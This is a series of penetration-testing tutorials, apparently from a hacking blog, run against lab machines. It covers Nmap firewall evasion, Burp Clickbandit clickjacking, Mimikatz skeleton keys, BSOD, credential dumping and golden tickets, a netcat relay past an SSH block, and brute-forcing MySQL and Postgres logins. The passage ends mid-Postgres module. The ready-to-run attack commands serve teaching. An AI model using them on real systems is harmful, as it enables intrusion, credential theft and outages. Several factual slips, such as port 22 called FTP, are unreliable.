In this article we are going to scan the target machine with normal Nmap scan along with Timing template and the time between packets can be confirmed by analysis of Nmap traffic through Wireshark.

Timing template in nmap is defined by –T<0-5> having -T0 as the slowest and –T5 as the fastest. By default all nmap scans run on –T3 timing template. Timing template in Nmap is used to optimize and improve the quality and performance of scan to get desired results.

Let’s start!!

Nmap Insane (-T5) Scan

This template is used for sending packets insanely fast and waits only 0.3 seconds for response. The time difference between two packets sent is upto 5 milliseconds. This timing template makes the scan superfast but the accuracy is sacrificed sometimes. Nmap gives-up on a host if it couldn’t complete the scan within 15 minutes. Other than that, -T5 should be used only on fast network and high end systems as sending packets this fast can affect the working of the network or system and can result into system failure.

For using timing template use the attribute –T<0-5> after Nmap while scanning a target network

nmap -T5 -p21-25 192.168.1.104

Here are the packets sent to the target IP are sent by a maximum difference of 5 milliseconds or 0.005 seconds

Packet 1 has Arrival Time of 04:41:04.557153433

Packet 2 has Arrival Time of 04:41:04.557225304

The difference between the arrival time of Packet 1 and Packet 2 is about 0.07 milliseconds.

Nmap Aggressive (-T4) Scan

This template is used for sending packets very fast and waits only 1.25 seconds for response. The time difference between two packets sent is upto 10 milliseconds. Nmap official documentation recommends using –T4 for “reasonably modern and reliable networks”.

nmap –T4 –p21-25 –d 192.168.1.104

Here are the packets sent to the target IP are sent by a maximum difference of 5 milliseconds or 0.005 seconds

Packet 1 has Arrival Time of 05:58:34.636899267

Packet 2 has Arrival Time of 05:58:34.637122896

The difference between the arrival time of Packet 1 and Packet 2 is about 0.2 milliseconds.

Nmap Normal (-T3) Scan

This is the default nmap timing template which is used when -T argument is not specified.

nmap –T3 –p21-25 –d 192.168.1.104

Packet 1 has Arrival Time of 06:01:12.574866212

Packet 1 has Arrival Time of 06:01:12.575059033

The difference between the arrival time of Packet 1 and Packet 2 is about 0.1 milliseconds.

Nmap Polite (-T2) Scan

This template is used for sending packets quickly then –T0 and –T1 but still slower than normal scan. The time difference between two packets sent is 0.4 seconds.

nmap -T2 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:07:38.139876513

Packet 2 has Arrival Time of 06:01:12.540686453

Nmap Sneaky (-T1) Scan

This template is used for sending packets quickly but still slower than normal scan. The time difference between two packets sent is 15 seconds.

nmap -T1 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:17:02.354879724

Packet 2 has Arrival Time of 06:17:17.371063606

The difference between the arrival time of Packet 1 and Packet 2 is about 15 seconds.

Nmap Paranoid (-T0) Scan

This template is used for sending packets very slowly as only one port is scanned at a time. The time difference between two packets sent is 5 minutes.

nmap -T0 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:32:25.043303267

Packet 2 has Arrival Time of 06:37:25.080804929

The difference between the arrival time of Packet 1 and Packet 2 is about 5 minutes.

Evading Time Based Firewall rules using timing templates

Block Insane T5 scan

Even though we can speed up the scan by –T5 and –T4 templates, there are chances that the target system is using some kind of firewall rules to secure itself. Here are some examples of the firewall rules and methods to bypass them.

This rule will block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 1 second.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  1 –hitcount 1 -j DROP

If you’re scanning more than 1 port on a target system having above rule, the result will not be as desired. Like if we use -T5 or -T4 in nmap scan, the time difference between packets is very much less than 1 second so if we scan five ports at a time it will show one as open/closed and others as filtered. But -T5 has also –max-retries set to 2 means it will retry to get reply from ports 2 more times hence there will be 3 out 5 ports with accurate open/close status and the rest 2 with filtered status

nmap -T5 -p21-25 192.168.1.104

From given below image you can observe that it has shown 3 ports are open and 2 ports are filtered.

The packet transfer between the target and the victim is captured through wireshark, it clearly shows that the TCP SYN packets are send multiple times on ports 22 and 23 and didn’t received any reply packet for those request packet.

Bypass Insane T5 Firewall filter

1^st method

Use –max-retries argument to increase the –max-retries value so that each retry gives accurate status of one port at a time. Execute given below command for increasing maximum retries with T5 scan here I had 4 you can modify it as per your requirement.

nmap -T5 -p21-25 192.168.1.104 –max-retries 4

now if you notice from given below image you can observe that it has shown all 5ports are open.

Here, the packet transfer shows that in each retry one different port sends the reply in order to confirm its statusas shown in given below image.

2^nd Method

The second method is to use a timing template which has a greater time difference between packets, like here we can use time template below T5 i.e. from T4 to T0 to bypass above rule.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

nmap -T1 -p21-25 192.168.1.104

or

nmap -T0 -p21-25 192.168.1.104

Here, the packet transfer shows that in each port sends the reply as the time difference between the packets is around 6 seconds.

Block Aggressive T4, Normal T3 & Polite T2 Scan

Now given below rules will block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 3 seconds.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  3 –hitcount 1 -j DROP

Here we are using -T4 for scanning 5 ports, the time difference between packets is very much less than 1 second so if we scan five ports at a time it will show one as open/closed and others as filtered. But –T4 has also –max-retries set to 6 means it will retry to get reply from ports 6 more times but as the time limit exceeds the total time taken by all retries it will show all ports filtered

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

Result of T4, T3, and T2 scan can be as either all port will be filtered or any one port can show open/close state. From given below image you can observe that it has shown all 5 ports are filtered.

Here we can see that none of the packets got reply

Bypass Aggressive T4, Normal T3 & Polite T2 Firewall filter

To bypass this kind of rule we have to use a Timing Template which is slower than -T4

nmap -T1 -p21-25 192.168.1.104

Here we can see that all the packets got reply because time interval in T1 is almost 15 seconds.

Block Sneaky (-T1) Scan

Now this rule is to block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 200 seconds.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  200 –hitcount 1 -j DROP

Now repeat the T1 scan again as given below and this time you will found that firewall is blocking our Nmap probes for identify open/close state of any port.

nmap -T1-p21-25 192.168.1.104

Results of T1 scan can be as either all port will be filtered or any one port can show open/close state. From given below image you can observe that it has shown all 4 ports are filtered.

Here we can see that only one of the packets got reply rest are drop by firewall.

Bypass Sneaky (-T1) Scan

To bypass this kind of rule we have to use a Timing Template which has time difference in packets for more than 200 seconds, therefore use paranoid time scan because time difference between two packets is near about 5 mints as discussed above.

nmap -T0 -p21-25 192.168.1.104

From given below image you can observe that it has taken 1813.61 sec which is close to 30 mints for scanning 5 ports and found open state for all 5 ports.

Here we can see that we have got response of every packet even though the firewall had the security rules set.

To evade any type of IPS or Firewall, you need to remember that it will take much longer time than usual to scan the target system using slower timing template so try to specify a small number of ports so that the slower scans doesn’t take time to scan the ports that you don’t intended to.

Auhtor:  Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.

The post Understanding Guide for Nmap Timing Scan (Firewall Bypass) appeared first on Hacking Articles.

Hello friends!! Today we are going to discuss advance option of Burp Suite pro for web penetration testing; here we had used Bwapp lab which you can install from here and acunetix vulnerable web application which is available online for making web application penetration practices.

Burp suite Advance Usage

• Burp Infiltrator
• Macros
• Burp Clickbandit

Burp Infiltrator

Burp Infiltrator is a tool used to target web applications in order to test them using Burp Scanner. Burp Infiltrator is used to target application so that Burp can detect cases where its input can pass unsafe APIs on the server side.

Burp Infiltrator supports applications which are written in:

• Java, Groovy, Scala, or other JVM languages (JRE versions 1.4 – 1.8)
• C#, VB, or other .NET languages (.NET versions 2.0 and later)

Let’s start!!

First, we need to enable the Burp Infiltrator from the Burp tab in burpsuite where we have to select the Burp Infiltrator option. Then we will see a Burp Infiltrator box will appear where you have to select the type of application you want to instrument as you shown in the image

 After that we need to select the folder where we want the Infiltrator file to be saved, so that we can enable it later using the terminal.

Next we will give the path of the folder where the infiltrator file will be saved as shown in the image.

Than the Burp Infiltrator file will be saved as burp_infiltrator_java.jar.

Now to enable the burp infiltrator file we will go to the path of the file using the terminal, than to execute it we need to give the command java –jar burp_infiltrator_java.jar –non interactive. Then Press Enter the file will be executed.

We have used –non interactive in our command so that it will automatically configured the default settings else we have to manually configure all the settings. Now we can intercept the request of any website or application based on the supported parameters as shown in the image.

Turn off Intercept Tab. Select the Target Tab where we can see a Sub Tab in it as Site Map as shown in the image.

Then select the Url you want to scan using burp infiltrator, just Right click on the Url then select option Actively scan this host this will give all the issues related to the Website or application we want to scan. All the Issues related to the Url scanned can be seen in the Issue box as shown in the image.

Macros

Burp suite has a new session handling ability which can be used to run macros, according to session handling rules. A macro can be said as a predefined sequence of one or more than one request. The cases in Macros may include:

• Fetching a page such as a user’s home page just to check whether the current session is still valid or not.
• By performing a login operation to obtain a new valid session.
• A token or nonce obtained can be used as a parameter in another request.

The Macros can be recorded using your browser. When defining a macro, Burp suite displays the Proxy history, from which you can select the requests to be used for the macro. You can select from previously made requests, or record a fresh macro and select the new items from the history. When you have recorded the macro, the macro editor shows the details of the items in the macro, which you can review and configure as per requirement.

Let’s start!!

First we have intercepted the login request of Bwapp Lab where we have given the default username and password as shown in the image.

The request is captured in the Intercept Tab then Right Click anywhere around the captured request, next we need to select the option Do Intercept which has a sub option Response to this request. Click on it.

Then we have forward the captured request until we are successfully logged into the Bwapp Lab.

After that go to Project options Tab where we need to select the Sessions Tab as shown in the image.

Click on Add Button under the Session Handling Rules which will open a Session handling rule editor window where we have given a name to the Rule under the Rule description as shown in the image.

Click on Add Button under Rule Action then select Check session is valid option which will open a window for Session handling action editor then give a expression you want the burp suite to look up in the Url like we have given login.php and Tick the option If session is invalid, perform the action below as shown in the image.

Click on Add Button under Select Macro which open a window of Macro Recorder where we will select the item from the proxy history that we want to include in the Macro as shown in the image, Click Ok.

Next the Macro Editor window will open where we will give a name to the macro in the Macro description field as shown in the image. Click Ok.

After this we will get back to Session handling rule editor where we will click on the Scope tab then we need to tick the options Extender, Proxy under Tools Scope and Include all URL’s under URL Scope, Click Ok now the macro will be running in the background.

As you can see in the image we are on the login page of the Bwapp Lab where we have not given any login details.

We made a simple change in the URL we replaced login.php with portal.php as shown in the image.

This has successfully logged us into Bwapp Lab without giving any login details.

Burp Clickbandit

Burp Clickbandit option in burp suite is a tool used for generating clickjacking attacks. When you know a web page that is vulnerable to clickjacking, we can use Burp Clickbandit to create an attack, and to confirm the vulnerability can be successfully exploited. When running Burp Clickbandit on untrusted websites. Malicious JavaScript from the target site can take the authority of the HTML output that is generated by Burp Clickbandit. There are two modes in Burp Clickbandit as follows:

Record Mode

Burp Clickbandit first opens in record mode. Then we need to perform one or more mouse clicks to record your clickjacking attack, as this will involve performing the mouse clicks that the victim user needs to perform for making some desired action. We can also use the “disable click actions” checkbox to record clicks without the target page handling them. When you have finished recording, click the “Finish” button to enter review mode.

Review Mode

When you have finished recording your clickjacking attack, Burp Clickbandit enters into review mode. This lets you review the generated attack, with the attack user interface over the original page UI. You can click the buttons on the attack UI to verify that the attack works.

List of commands that are available in review mode:

• + And – buttons are used to zoom in and out.
• The “toggle transparency” button allows you to show or hide the original page UI.
• The “reset” button restores the generated attack, as it was before any further clicks were made.
• The “save” button is used to save an HTML file containing the attack. This can be used as a real-world exploit as clickjacking vulnerability.
• You can use the keyboard arrow keys to reposition the attack UI over the original page UI, if not correctly aligned with the original page UI.

Let’s start!!

Burp Clickbandit runs on browser using JavaScript. It can work on all latest browsers except for Microsoft IE and Edge.

To run Clickbandit, go to the Burp menu and select “Burp Clickbandit”.

Click the “Copy Clickbandit to clipboard” button. This will copy the Clickbandit script to your clipboard.

In your browser, visit the web page that you want to test, in the same way we regularly do. Then in your browser, open the web developer console. This might also be called “developer tools” or “JavaScript console”. Paste the Clickbandit script by editing allow pasting before pasting copied code into the web developer console, and press enter.

The Burp Clickbandit Logo will appear at the top of the browser window and the original page will be loaded with in the frame which ready for the attack to be performed, this is said to be the record mode of burp clickbandit. Then we need to perform one or more mouse clicks to record your clickjacking attack, as this will involve performing the mouse clicks that the victim user needs to perform for making some desired action. We can also use the “disable click actions” checkbox to record clicks without the target page handling them. When you have finished recording, click the “Finish” button to enter review mode.

When you have finished recording your clickjacking attack, Burp Clickbandit enters into review mode. This lets you review the generated attack, with the attack user interface over the original page UI.

Click on Save Button, allows you to save an html file containing the attack. This can be used as a real-world exploit as clickjacking vulnerability.

We have opened the saved html file which shows a transparent UI we have created over the original UI with a click button in the red box appearing on the page.

We can click the buttons on the attack UI to verify that the attack works. A message will appear the, you’ve been Clickjacked as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Advance Web Application Testing using Burpsuite appeared first on Hacking Articles.

What is Mimikatz?

Mimikatz is a Tool made in C Language by Benjamin Delpy. It is a great tool to extract plain text passwords, hashes and Kerberos Tickets from Memory. It can also be used to generate Golden Tickets.

You can get Mimikatz In ZIP from here. Or you can build it for git from here.

Mimikatz comes in 2 architectures: x32 and x64. Here is a screenshot of the x64 mimikatz bash.

Generate Skeleton Key with Mimikatz

Victim: Windows Server 2012 R2 (Domain Controller)

Attacker: Mimikatz (On Windows Server 2012 R2)

In this attack, what mimikatz installs the patch on the Domain Controller to accept “mimikatz” as a new logon password? It can be thought as a Master Key which will open the Active Directory to the attacker. This attack can be performed as shown below.

First, I will try to logon on my Server using mimikatz as a password.

As you can see clearly that we cannot logon into server using ‘mimikatz’ as a password.

Now I will login the server using its password which is ‘T00r’.

And as you can see below I have logged in the Server using the correct password

If you ever are logged in on a server or have a server unlocked, you can create a skeleton key to be stored inside the memory of the Server by using Mimikatz.

Launch the Mimikartz Terminal according to the architecture of the server (x32, x64). Now first we will get the Debuging privilege in Mimikatz using

Command: privilege::debug

And then we will inject the mimikatz skeleton key in the memory of server using

Command: misc::skeleton

With this we have our skeleton key successfully injected on the server.

Note: You will have to open mimikatz with Administrative Privilege to create a Skeleton Key.

Now I will try to login the server using the skeleton key “mimikatz” we just injected in the memory. Remember last time we tried to login the server using mimikatz as a password we were unsuccessful.

But this time ‘mimikatz’ was accepted as a password. This does not mean that we reset the original password ‘T00r’. The server will continue to login using ‘T00r’ but now it will also accept ‘mimikatz’ as a password too.

Now, remember that we injected the skeleton key in the memory, not in storage so the next time that admin restarts the server we will lose the access. So the best way to protect your Domain Controller from Skeleton Key is a practice of restarting the Server Frequently or prevents mimikatz from accessing the memory.

Blue Screen of Death (bsod) with Mimikatz

Attacker: Mimikatz (on Windows 7)

Victim: Windows 7

We can perform a Blue Screen of Death or bsod attack using mimikatz. This shows how powerful this tool is.  To perform the bsod on a System follow the steps mentioned below:

• Run mimikatz with Administrator
• Start mimidrv service

Command: !+

Now Initiate the Bsod as given below in the following command.

Command: !bsod

As you can see below we have the Blue Screen of Death Error

Note: This attack can corrupt data and potentially harm the system. Use Carefully !!

Display Hostname

You can extract hostname of the Victim System by typing hostname in the mimikatz Terminal.

Command: hostname

We have extracted the hostname of system as Pavan-pc

Golden Ticket Genration with Mimikatz

Attacker: Mimikatz on Windows Server 2012 R2

Victim: Windows Server 2012 R2

To Generate a Golden Ticket, we will require the following information:

1. Domain
2. SID
3. NTLM Hash

Let’s get the Domain First.

To get the Domain we will run the ipconfig /all from the Command Line or PowerShell

• Domain on my Server is Pavan.local
• Now to get SID we will use whoami /user command as shown in given below image.

Now we will mimikatz itself to extract the ntml hash required to generate the Ticket.

First we will get the Debugging Privilege using following command given below.

Command: privilege::debug

And now to extract hashses we will run following command given below.

Command: selurlsa::logonpasswords

And now we have it all that we need to generate the Ticket.

Syntax: kerbros::golden /domain:[Domain] /sid:[SID] /rc4:[NTLM Hash] /user:[Username To Create] /id:500 /ptt

Command: kerbros::golden /domain:PAVAN.LOCAL /sid:S-1-5-21-1118594253-693012904-2765600535 /rc4:9a7a6f22651d6a0fcc6e6a0c723c9cb0 /user:hacker /id:500 /ptt

Here I am creating the golden key for a user named ‘hacker’; you can use any of the existing users of the Domain or create a new one.

I am using [/ppt] option to pass the ticket in the current session.

Now run command prompt to the access of Share Folder and execute given below command:

pushd \\WINSERVER01\c$

Now we are in Z: drive execute given below command for NT directory services

cd WINDOWS\NTDS

DIR

As you can see that we get the access to the share folder which cannot be accessed without Admin Access but we had obtained it without using CMD as administrator. From given below image you can observe that it is showing 8 file and 2 folder.

Remotely Generating Golden Ticket

Attacker: Kali

Victim: Windows Server 2012 R2

Firstly get a Meterpreter Access of the Server which you can learn from here

Once gaining the meterpreter upload the mimikatz folder to the victim system using the command

Command: upload  -r /root/Desktop/mimi c:\

Remember to use -r so that upload command uploads recursively.

Open the shell and extract Domain using ipconfig /all

And SID using the whoami /user

Now go to the location where we uploaded the mimikatz earlier and run mimikatz.exe as shown below

Now let’s extract the krbtgt NTLM hash using the following command

Command: lsadump::lsa /inject /name:krbtgt

Now using all the information extracted lets generate a golden ticket in the same way we did above.

Command:  kerberos::golden /domain:pavan.loc /sid:S-1-5-21-97841242-3460736137-492355079 /rc4:e847d2e54044172830e3e3a6b8438853 /user:Hacker /id:500 /ptt

Now let’s take the access of Share Folder and as you can see that we get the access to the share folder which cannot be accessed without Admin Access.

Hence we successfully generated a golden ticket in a Windows Server Remotely via Kali

Now let’s take the access of Share Folder and as you can see that we get the access to the share folder which cannot be accessed without Admin Access.

Hence we successfully generated a golden ticket in a Windows Server Remotely via Kali

Hack the Minesweeper Game

We all have played Minesweeper Game, and it is tough to get all the mines right but those days of worry are over. To show that the Mimikatz is a powerful but a playful Tool, here I will hack the minesweeper game using Mimikatz.

Firstly open Mimikatz of your respective architecture.

And then open the Minesweeper Game

To load minesweeper in the mimikatz by using

Command: minesweeper::infos

You can see in the above screenshot that that minesweeper grid is shown in the mimikarz shell.

Now click on any Random block on the Minsweeper.

Now run the previous command again and now we have locations of mine on the grid.

You can verify this image with the One with Mimikatz shell.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Understanding Guide to Mimikatz appeared first on Hacking Articles.

Scanning port is a technique used by penetration tester for identifying state of computer network services associated with particular port number. For example port 80 is available for HTTP service and port 22 is available for FTP service.  We suggest using Nmap for enumerating port state, for best practice click here and learn Nmap working in detail.

Moreover Metaspolite also serves port scanning for enumerating computer network services and make it easier as compare to Nmap.

Let’s start!!

Requirement

Attacker:  Kali Linux (192.168.1.103)

Target: Ubuntu (192.168.1.105)

Open the terminal and add given below iptables rules for incoming packet traffic in target’s network which will drop the tcp ACK packet on port 80 and SYN packet on port 22 respectively.

sudo iptables -I INPUT -p tcp –tcp-flags ALL ACK –dport 80 -j DROP

sudo iptables -I INPUT -p tcp –tcp-flags ALL SYN –dport 22 -j DROP

ACK Scan

Now open the terminal in your Kali Linux and type msfconsole to load metasploit framework and execute given below auxiliary command to run specific module.

This module will Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.

Now as specified in given below command this module will send ack packet on port 21, 22, 80,443 to enumerate state of firewall for these ports. If it receives reset packet as reply from destination port then it will display unfiltered state for that particular port and if does not received reset packet from destination port then it will not show any comment for that particular port which means the port is protected by firewall.

use auxiliary/scanner/portscan/ack

msf auxiliary(ack) > set rhosts 192.168.1.105

msf auxiliary(ack) > set ports 21,22,80,443

msf auxiliary(ack) >exploit

From given below image you can observed that it is showing TCP unfiltered for port 21,22,443 and did not comment for  port 80 hence port 80 is filtered . This scan can be only used for identifying state of firewall in terms of port filter or unfiltered.

We had used wireshark for demonstrating ack scan and here you can observe that port 80 doesn’t reply with RST packet which means ack packet for port 80 has been blocked by network administrator.

SYN Scan

This module enumerates open TCP services using a raw SYN scan, here syn packet will be sent on port 21, 22, 80,443 to enumerate state open/closed for these ports. If it receives syn,ack packet as reply from destination port then it will display OPEN state for that particular port and if does not receives syn,ack packet from destination port then it will not show any comment for that particular port  which indicates filtered or Closed state for that particular port.

use auxiliary/scanner/portscan/syn

msf auxiliary(syn) > set rhosts 192.168.1.105

msf auxiliary(syn) > set ports 21,22,80,443

msf auxiliary(syn) >exploit

From given below image you can observed that it is showing TCP OPEN for port 21,80,443 and did not comment for  port 22 hence port 22 is filtered or closed .

Again we had used wireshark for demonstrating syn scan and here you can observe that port 22 doesn’t reply with SYN, ACK packets which mean SYN packet for port 22 has been blocked by network administrator.

Moreover you can observe following packet communication between source and destination port.

• Source port sends SYN packet to destination port
• Source port receives SYN, ACK packet from destination port
• Source port sends RST packet to destination port

TCP Scan

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 192.168.1.105

msf auxiliary(tcp) > set ports 21,22,80,443

msf auxiliary(tcp) >exploit

This scan is similar as SYN scan only the difference is that it follows TCP full communication i.e. 4-way handshake and SYN scan is follows half TCP communication.

From given below image you can observed that it is showing TCP OPEN for port 21,80,443 and did not comment for  port 22 hence port 22 is filtered or closed.

Here you can observe that port 22 doesn’t reply with SYN, ACK packets which mean SYN packet for port 22 has been blocked by network administrator.

Moreover you can observe following packet communication between source and destination port.

• Source port sends SYN packet to destination port
• Source port receives SYN, ACK packet from destination port
• Source port sends ACK packet to destination port
• Source port sends FIN, ACK packet to destination port

XMAS Scan

Enumerate open|filtered TCP services using a raw “XMas” scan; this sends probes containing the FIN, PSH and URG flags.

Instead of using TCP 3-way handshake communication this scan uses other tcp flags for TCP communication for enumerating state of ports.

use auxiliary/scanner/portscan/xmas

msf auxiliary(xmas) > set rhosts 192.168.1.105

msf auxiliary(xmas) > set ports 21,22,80,443

msf auxiliary(xmas) >exploit

From given below image you can observed that, this time it has shown TCP OPEN| FILTERED for all ports i.e.  21,22,80,443

If you notice given below image here source port sends FIN, PUSH and URG packets to destination and destination port didn’t sent any reply to source port which indicates above specified port are open and if any destination port sends RST, ACK packet to source port then it indicated that particular port is closed.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Port Scanning using Metasploit with IPTables appeared first on Hacking Articles.

Today we are going to access the ssh port which is blocked by the firewall and is forwarded to another port through Port relay tool. Netcat relay is quite useful tool to connect with any remote system by evading the firewall restriction.

Attacker: Kali Linux (IP: 192.168.1.2)

Victim: Ubuntu Server (IP: 192.168.1.7)

Connect to SSH via port 22

Lets first try to get the normal SSH shell.  As you can see in the given screenshot we successfully get a ssh shell on the port 22 of the Server 192.168.1.7.

Command: ssh pavan@192.168.1.7

Block Port 22 for Incoming TCP Packet

Now let’s block SSH service Port 22 for Incoming TCP Packet using Iptables. Here we are making an inbound rule to block the tcp packets on the port 22 if the packet source is Kali (192.168.1.2)

Command: iptables –A INPUT –s 192.168.1.2 –p tcp –dport 22 –j DROP

After Blocking the port let’s try to get a shell. From given below image you can observe that we got a Connection Time Out Error as the packets are dropped by the firewall.

Allow TCP Packets on another port

Now let’s make a rule in the firewall to accept the tcp packets on the port 4444 if the packet source is Kali (192.168.1.2).

Command: iptables –I INPUT 1 –s 192.168.1.2 –p tcp –dport 4444 –j ACCEPT

Check Netcat communication between Attacker and Client

Let’s check if we can get a netcat session on the port 4444 to the Kali (192.168.1.2).

Command: nc –v –l –p 4444

Command: nc 192.168.1.7 4444

As you can see in the given Image that we have received a netcat session on the port 4444 from SSH server on the Kali (192.168.1.2).

Use Netcat Relay backpipe to access SSH service

Now we will have to make a Relay. But first, let’s understand, what the commands depicted below do?

The First command makes a special type of file called a FIFO or named pipe. We call it backpipe because it is going to carry our responses back through the relay.

Now the second command makes a netcat listener that is allowed through the firewall. This Netcat listener will connect its standard input (0<) to the backpipe. We then forward the standard output of this Netcat listener to Netcat client, which connects to our localhost (127.0.0.1) on TCP port 22 where sshd listens. We then use the forward pipe (1>) to send data and receive responses simultaneously. We need a back and forward pipe because Netcat provides a two-way communication.

Command: mknod /tmp/backpipe p

[p]: Tells the mknod to create a FIFO

Command: nc –l –p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe

[-l]: Listener

[-p]: Port

Access SSH through Netcat Relay

Now let’s try to connect the ssh connection through the port 4444.

Command: ssh pavan@192.168.1.7 –p 4444

[-p]: To specify Port

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Bypass SSH Restriction by Port Relay appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s PC through mysql service via port 3306. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as root and password as toor.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as root and password as toor.

xHydra

This is the graphical version to apply dictionary attack via 3306 port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select MYSQL in box against Protocol option and give the port number 3306 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 mysql

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as root and password as toor.

Metasploit

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.106

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > set stop_on_success true

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).   Contact Here

The post 5 Ways to Hack MySQL Login Password appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s PC through 5432 Port use for Postgres service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

 Let’s starts!!

 Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, postgres, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres 

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.

xHydra

This is the graphical version to apply dictionary attack via 5432 port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select postgres in box against Protocol option and give the port number 5432 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.120 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.120:5432

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as postgres and password as postgres.

Patator

 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as POSTGRES, HTTP, SMB and etc.

patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.

Metasploit

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/postgres/postgres_login

msf exploit (scanner/postgres/postgres_login)>set rhosts 192.168.1.120 (IP of Remote Host)

msf exploit (scanner/postgres/postgres_login)>set user_file  /root/Desktop/user.txt

msf exploit (scanner/postgres/postgres_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (scanner/postgres/postgres_login)>set stop_on_success true

